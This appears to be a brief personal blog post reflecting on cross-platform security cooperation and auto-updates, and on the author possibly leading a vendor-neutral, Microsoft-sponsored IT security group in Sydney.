The question I put forward, is this finally a time of security as an institution. Security how it should be done, globablly. Sure it is still relying on Admins at the other end, but with Auto updates being the norm, it should be fine. This to me seems a step in the right direction, and I am sure even a couple years ago this wouldn't have happened. Will this one day lead us to a security utopia free of vulnerabilites and insecurites, no. But it may lead to sharing and assistance cross platform.
Speaking of security, there is talk of an IT Security group being started up in Sydney, and I maybe taking the reigns. It will be sponsored by Microsoft but if I take the reigns I plan on being vendor neutral, all-be-it Microsoft has some nice claims to fame, and even with all their foibles and hatred that is flung at them, they do try and do some stuff right. Operating systems are tools, you should use the right tool for the right job.